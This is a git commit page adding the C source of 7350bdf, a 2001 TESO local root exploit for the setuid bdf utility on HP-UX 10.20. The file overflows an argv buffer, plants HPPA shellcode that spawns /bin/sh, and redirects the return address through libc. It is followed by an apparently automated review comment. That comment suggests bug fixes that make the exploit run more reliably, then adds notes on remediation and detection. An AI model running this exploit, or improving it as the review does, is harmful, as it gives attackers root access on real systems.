authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /exploits/7350bdf
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'exploits/7350bdf')
-rw-r--r--exploits/7350bdf/7350bdf.c201
1 files changed, 201 insertions, 0 deletions
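--- /dev/null
+++ b/exploits/7350bdf/7350bdf.c
@@ -0,0 +1,201 @@
+/* 7350bdf - hppa/hpux bdf local root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za, PacketStorm Security and SecuriTeam websites and any public
+ * exploit archive.
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * found by scut 2001/08/21, yah yah i know its old
+ * kudos to caddis for enlightning me about quadrants
+ *
+ */
+
+#define VERSION "0.0.1"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+
+void usage (char *progname);
+
+
+typedef struct {
+ char * desc;
+ int bsize; /* overall buffer size */
+ int align;
+
+ /* the return address has to
+ *
+ * a) lie within the shared library quadrant (within libc)
+ * b) point to some code snippet that looks like this:
+ *
+ * 0xc0108ea8: ldw -18(sr0,sp),rp
+ * 0xc0108eac: ldsid (sr0,rp),r1
+ * 0xc0108eb0: mtsp r1,sr0
+ * 0xc0108eb4: be,n 0(sr0,rp)
+ *
+ * this sets the space id accordingly, so we can return into
+ * the stack
+ */
+ int ret_pos;
+ unsigned int ret_addr;
+
+ /* this is the address our code lies at, and the position where to
+ * put it
+ */
+ int code_pos;
+ unsigned int code_addr;
+
+ /* at least HP-UX 10.20 needs a sane value at a place, which i
+ * happened to call r15_val, since it is passed through %r15
+ */
+ int r15_pos;
+ unsigned int r15_val;
+} t_elem;
+
+t_elem targets[] = {
+ /* tested on: HP-UX calina B.10.20 A 9000/735 -sc */
+ { "HP-UX 10.20", 1200, 3, 1196, 0xc0108ea8,
+ 1192, 0x7b03a220, 1040, 0x7b03a4f8 },
+
+ { NULL, 0, 0, 0, 0, 0 },
+};
+
+
+/* LSD shellcode, thanks buddies */
+unsigned char nop[] =
+ "\x0b\x39\x02\x99"; /* xor %r25,%r25,%r25 */
+
+unsigned char shellcode[] =
+ "\x0b\x5a\x02\x9a" /* xor %r26,%r26,%r26 */
+ "\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */
+ "\x0b\x18\x02\x98" /* xor %r24,%r24,%r24 */
+ "\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */
+ "\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */
+ "\xb4\x16\x70\xfc" /* addi,> 0x7e,%r0,%r22 */
+
+ "\xeb\x5f\x1f\xfd" /* bl <shellcode+4>,%r26 */
+ "\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */
+ "\xb7\x5a\x40\x22" /* addi,< 0x11,%r26,%r26 */
+ "\x0f\x40\x12\x0e" /* stbs %r0,7(%r26) */
+ "\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */
+ "\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */
+ "\xb4\x16\x70\x16" /* addi,> 0xb,%r0,%r22 */
+ "/bin/shA";
+
+
+void
+usage (char *progname)
+{
+ fprintf (stderr, "usage: %s [-t <num>]\n\n", progname);
+ fprintf (stderr, "-t num\tchoose target (0 for list)\n\n");
+
+ exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+ char c;
+ int b_walker;
+ unsigned int * iptr;
+ unsigned char buf[2048];
+
+ char * n_argv[3];
+ char * n_env[1];
+
+ int tgt_num = -1;
+ t_elem * tgt;
+
+
+ printf ("7350bdf - hppa/hpux bdf local root exploit\n"
+ "-scut\n\n");
+
+ while ((c = getopt (argc, argv, "t:")) != EOF) {
+ switch (c) {
+ case 't':
+ tgt_num = atoi (optarg);
+ break;
+ default:
+ usage (argv[0]);
+ break;
+ }
+ }
+
+ if (tgt_num < 0)
+ usage (argv[0]);
+
+ if (tgt_num == 0) {
+ printf ("num . description\n");
+ printf ("----+--------------------------------\n");
+
+ for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
+ printf ("%3d | %s\n", tgt_num + 1,
+ targets[tgt_num].desc);
+
+ printf (" '\n");
+
+ exit (EXIT_SUCCESS);
+ }
+
+ if (tgt_num >= (sizeof (targets) / sizeof (t_elem)))
+ usage (argv[0]);
+
+ tgt = &targets[tgt_num - 1];
+ printf ("using: %s\n", tgt->desc);
+
+ memset (buf, '\0', sizeof (buf));
+
+ /* set nops */
+ if (tgt->align != 0)
+ memset (buf, 'A', tgt->align);
+
+ for (b_walker = tgt->align ; b_walker < (tgt->bsize - tgt->align) ;
+ b_walker += 4)
+ {
+ buf[b_walker] = nop[0];
+ buf[b_walker + 1] = nop[1];
+ buf[b_walker + 2] = nop[2];
+ buf[b_walker + 3] = nop[3];
+ }
+
+ if (tgt->r15_pos != 0) {
+ iptr = (unsigned int *) &buf[tgt->r15_pos];
+
+ *iptr = tgt->r15_val; /* sane %r15 */
+ }
+
+ iptr = (unsigned int *) &buf[tgt->code_pos];
+ *iptr = tgt->code_addr; /* real retaddr */
+
+ iptr = (unsigned int *) &buf[tgt->ret_pos];
+ *iptr = tgt->ret_addr; /* yay! */
+
+ /* we assume the buffer is 1024 bytes long */
+ memcpy (&buf[1023] - strlen (shellcode), shellcode,
+ strlen (shellcode));
+
+ buf[tgt->bsize] = '\0';
+
+ n_argv[0] = "/usr/bin/bdf";
+ n_argv[1] = buf;
+ n_env[0] = NULL;
+
+ execve (n_argv[0], n_argv, n_env);
+
+ exit (EXIT_FAILURE);
+}
+
+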
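Review bot: `n_argv[2]` is never assigned before `execve (n_argv[0], n_argv, n_env);`, so the argv array is not NULL-terminated and the exec reads an uninitialized pointer from the stack (undefined behavior); the array is declared with three slots for exactly this purpose, so add `n_argv[2] = NULL;` after `n_argv[1] = buf;`. The file calls `memset`, `memcpy` and `strlen` without `#include <string.h>`, relying on implicit declarations that C99 removed, and `strlen (shellcode)` passes an `unsigned char *` where `const char *` is expected. In the option loop `char c` is compared against `EOF` although `getopt` returns `int`; declare `int c` so the sentinel compare is portable regardless of `char` signedness. From a hardening standpoint the header comment could state what the code documents: that `/usr/bin/bdf` on HP-UX 10.20 (presumably setuid-root, since the file is a local root exploit) overflowed an argv-derived buffer the code assumes to be 1024 bytes, so the remediation is the vendor patch or removing the setuid bit, and an audit can look for unusually long or non-printable argv strings passed to that binary.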